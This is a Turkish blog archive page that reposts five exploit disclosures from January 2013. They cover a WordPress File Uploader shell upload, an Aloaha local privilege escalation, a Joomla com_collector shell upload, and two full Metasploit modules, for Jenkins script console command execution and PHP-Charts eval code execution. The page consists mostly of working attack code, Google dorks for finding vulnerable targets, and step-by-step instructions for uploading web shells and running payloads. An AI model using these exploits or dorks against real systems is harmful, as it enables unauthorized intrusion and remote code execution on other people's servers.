Archive for 22 Ocak 2013

WordPress File Uploader Plugin PHP File Upload Vulnerability

WordPress ve joomlanın bitip tükenmeyen PHP file uload açıkları tüm hızıyla bulunmaya devam ediliyor.
Gene wordpress eklentilerinden File Uplooder Eklentisinde bulunan açık ve kullanım şekli şu şekilde;

# Exploit Title: WordPress File Uploader Plugin PHP File Upload Vulnerability
# Date: 01/21/2013
# Google Dork: inurl:"wp-file-uploader.php"
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-file-uploader-1.1.txt
# Vendor Homepage: http://wordpress.org/extend/plugins/wp-file-uploader/
# Software Link: http://downloads.wordpress.org/plugin/wp-file-uploader.zip
# Version: 1.1 and probably prior
# Tested on: WordPress 3.5 on Windows and Linux
 
Vulnerable Code: (process-form.php)
 
97: $filepart = fileinformation( $_FILES['postimage']['name'] );
98: $filename = $filepart['basename'];
99: // check if this filename already exist in the folder
100: $i = 2;
101: while ( in_array( $filename, $imageslist ) ) {
102: $filename = $filepart['filename'] . '_' . $i++ . '.' .$filepart['extension'];
103: }
104:  move_uploaded_file($_FILES["postimage"]["tmp_name"], $file_path.$filename);
 
Description:
 
Plugin simply upload the attachment with original name and extension to "wp-content/uploads/".
An attacker can upload php files and access them from remote.
 
Proof of Concept:
 
1. Visit vulnerable target and navigate to the "File Uploader" site.
2. Upload a file named shell.php
3. Access it with the browser on example.com/wp-content/uploads/shell.php
 
Done!
 
Proof Video: http://goo.gl/ogbsA

Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability

Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation açığına ilişkin açığın localde kullanım şekli ve açığın oluşumu şu şekilde;

Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability


Vendor: Aloaha Software - Wrocklage Intermedia GmbH
Product web page: http://www.aloaha.com
Affected version: 5.0.226

Summary: Aloaha Credential Provider represents one of the most dramatic changes
in the Windows Vista / 7 logon screen, making it much easier to implement new user
authentication scenarios that are supported by the OS. To be able to logon via
Smartcard to a windows machine requires usually the machine being a member of a
domain. With the Aloaha Credential Provider that is not required, the logon screen
is the first thing users see when they turn on the computer.

Desc: The Aloaha Credential Provider Service is vulnerable to an elevation of
privileges vulnerability which can be used by a simple user that can change the
executable file with a binary of choice. The vulnerability exist due to the
improper permissions, with the 'F' flag (full) for the 'Everyone' group, for the
'AloahaCredentialProviderService.exe' binary file. The service was shipped with
Aloaha PDF Saver and possibly every SmartCard Software package from Aloaha. The
files are installed in the 'Wrocklage' directory which has the Everyone group
assigned to it with full permissions making every single file inside vulnerable
to change by any user on the affected machine. After you replace the binary with
your rootkit, on reboot you get SYSTEM privileges.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit/64bit


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5124
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5124.php


19.01.2013


---------------------------------------------------------------------------------

C:\Program Files\Wrocklage>sc qc AloahaCPM
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AloahaCPM
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Aloaha Credential Provider Monitor
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Program Files\Wrocklage>cacls AloahaCredentialProviderService.exe
C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe NT AUTHORITY\SYSTEM:(ID)F
                                                               Everyone:(ID)F
                                                               BUILTIN\Administrators:(ID)F
                                                               BUILTIN\Users:(ID)R


C:\Program Files\Wrocklage>

---------------------------------------------------------------------------------

Jenkins Script-Console Java Execution

Jenkins Script-Console Java Execution açığına ilişkin olarak metasploit exploit aşağıdaki gibidir.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Jenkins Script-Console Java Execution',
			'Description'    => %q{
					This module uses the Jenkins Groovy script console to execute
				OS commands using Java.
			},
			'Author'	=>
				[
					'Spencer McIntyre',
					'jamcut'
				],
			'License'        => MSF_LICENSE,
			'DefaultOptions' =>
				{
					'WfsDelay' => '10',
				},
			'References'     =>
				[
					['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']
				],
			'Targets'		=>
				[
					['Windows',  {'Arch'  => ARCH_X86, 'Platform' => 'win'}],
					['Linux',    { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
					['Unix CMD', {'Arch'  => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
				],
			'DisclosureDate' => 'Jan 18 2013',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('USERNAME',  [ false, 'The username to authenticate as', '' ]),
				OptString.new('PASSWORD',  [ false, 'The password for the specified username', '' ]),
				OptString.new('TARGETURI', [ true,  'The path to jenkins', '/jenkins/' ]),
			], self.class)
	end

	def check
		uri = target_uri
		uri.path = normalize_uri(uri.path)
		uri.path << "/" if uri.path[-1, 1] != "/"
		res = send_request_cgi({'uri' => "#{uri.path}login"})
		if res and res.headers.include?('X-Jenkins')
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Safe
		end
	end

	def on_new_session(client)
		if not @to_delete.nil?
			print_warning("Deleting #{@to_delete} payload file")
			execute_command("rm #{@to_delete}")
		end
	end

	def http_send_command(cmd, opts = {})
		request_parameters = {
			'method'    => 'POST',
			'uri'       => "#{@uri.path}script",
			'vars_post' =>
				{
					'script' => java_craft_runtime_exec(cmd),
					'Submit' => 'Run'
				}
		}
		request_parameters['cookie'] = @cookie if @cookie != nil
		res = send_request_cgi(request_parameters)
		if not (res and res.code == 200)
			fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
		end
	end

	def java_craft_runtime_exec(cmd)
		decoder = Rex::Text.rand_text_alpha(5, 8)
		decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
		cmd_array = Rex::Text.rand_text_alpha(5, 8)
		jcode =  "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
		jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"

		jcode << "String [] #{cmd_array} = new String[3];\n"
		if target['Platform'] == 'win'
			jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
			jcode << "#{cmd_array}[1] = \"/c\";\n"
		else
			jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
			jcode << "#{cmd_array}[1] = \"-c\";\n"
		end
		jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
		jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
		jcode
	end

	def execute_command(cmd, opts = {})
		vprint_status("Attempting to execute: #{cmd}")
		http_send_command("#{cmd}")
	end

	def linux_stager
		cmds = "echo LINE | tee FILE"
		exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
		base64 = Rex::Text.encode_base64(exe)
		base64.gsub!(/\=/, "\\u003d")
		file = rand_text_alphanumeric(4+rand(4))

		execute_command("touch /tmp/#{file}.b64")
		cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
		base64.each_line do |line|
			line.chomp!
			cmd = cmds
			cmd.gsub!(/LINE/, line)
			execute_command(cmds)
		end

		execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
		execute_command("chmod +x /tmp/#{file}")
		execute_command("rm /tmp/#{file}.b64")

		execute_command("/tmp/#{file}")
		@to_delete = "/tmp/#{file}"
	end


	def exploit
		@uri = target_uri
		@uri.path = normalize_uri(@uri.path)
		@uri.path << "/" if @uri.path[-1, 1] != "/"
		print_status('Checking access to the script console')
		res = send_request_cgi({'uri' => "#{@uri.path}script"})
		fail_with(Exploit::Failure::Unknown) if not res

		@cookie = nil
		if res.code != 200
			print_status('Logging in...')
			res = send_request_cgi({
				'method'    => 'POST',
				'uri'       => "#{@uri.path}j_acegi_security_check",
				'vars_post' =>
					{
						'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
						'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),
						'Submit'     => 'log in'
					}
			})

			if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
				fail_with(Exploit::Failure::NoAccess, 'login failed')
			end
			sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0]
			@cookie = "#{sessionid}"
		else
			print_status('No authentication required, skipping login...')
		end

		case target['Platform']
		when 'win'
			print_status("#{rhost}:#{rport} - Sending VBS stager...")
			execute_cmdstager({:linemax => 2049})
		when 'unix'
			print_status("#{rhost}:#{rport} - Sending payload...")
			http_send_command("#{payload.encoded}")
		when 'linux'
			print_status("#{rhost}:#{rport} - Sending Linux stager...")
			linux_stager
		end

		handler
	end
end

PHP-Charts v1.0 PHP Code Execution Vulnerability

PHP-Charts v1.0 PHP Code Execution Açığına ilişkin php exploit ve açığın kullanımına ilişkin bilgiler aşağıdadır.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "PHP-Charts v1.0 PHP Code Execution Vulnerability",
			'Description'    => %q{
				This module exploits a PHP code execution vulnerability in php-Charts
				version 1.0 which could be abused to allow users to execute arbitrary
				PHP code under the context of the webserver user. The 'url.php' script
				calls eval() with user controlled data from any HTTP GET parameter name.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'AkaStep', # Discovery and PoC
					'Brendan Coles <bcoles[at]gmail.com>' # msf exploit
				],
			'References'     =>
				[
					['OSVDB', '89334'],
					['BID', '57448'],
					['EDB',   '24201']
				],
			'Payload'        =>
				{
					'BadChars' => "\x00\x0a\x0d\x22",
					'Compat'      =>
						{
						'PayloadType' => 'cmd',
						'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python',
						}
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "none"
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					['Automatic Targeting', { 'auto' => true }]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jan 16 2013",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The path to the web application', '/php-charts_v1.0/']),
			], self.class)
	end

	def check

		base  = target_uri.path
		base << '/' if base[-1, 1] != '/'
		peer  = "#{rhost}:#{rport}"
		fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
		code  = Rex::Text.uri_encode(Rex::Text.encode_base64("echo #{fingerprint}"))
		rand_key_value = rand_text_alphanumeric(rand(10)+6)

		# send check
		print_status("#{peer} - Sending check")
		begin
			res = send_request_cgi({
				'method' => 'GET',
				'uri'    => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
			})

			if res and res.body =~ /#{fingerprint}/
				return Exploit::CheckCode::Vulnerable
			else
				return Exploit::CheckCode::Safe
			end
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			print_error("#{peer} - Connection failed")
		end
		return Exploit::CheckCode::Unknown

	end

	def exploit

		base  = target_uri.path
		base << '/' if base[-1, 1] != '/'
		@peer = "#{rhost}:#{rport}"
		code  = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
		rand_key_value = rand_text_alphanumeric(rand(10)+6)

		# send payload
		print_status("#{@peer} - Sending payload (#{code.length} bytes)")
		begin
			res = send_request_cgi({
				'method' => 'GET',
				'uri'    => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
			})
			if res and res.code == 500
				print_good("#{@peer} - Payload sent successfully")
			else
				fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
			end
		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
				fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
		end

	end
end

Joomla com_collector Component Arbitrary File Upload Vulnerability

Joomla com_collector Component Arbitrary File Upload Açığı bulunmuş Olup açıkla ilgili olarak açığın bulunduyu yerler ve açığın kullanımı şu şekilde.

# Exploit Title:Joomla com_collecter shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home :HackForums.AL,alb0zz.in
# Date :19/01/2013

# Category:: web apps
# Google dork: [inurl:index.php?option=com_collector]
# Tested on: Windows XP

# Download: http://www.steevo.fr/en/download
# Home Page: http://www.steevo.fr/

---------------------------------------
#      ~ Expl0itation ~      #
---------------------------------------

1- Google dork: [inurl:index.php?option=com_collector]

2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

upload ur shell as : shell.php


                                           
# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.

#2013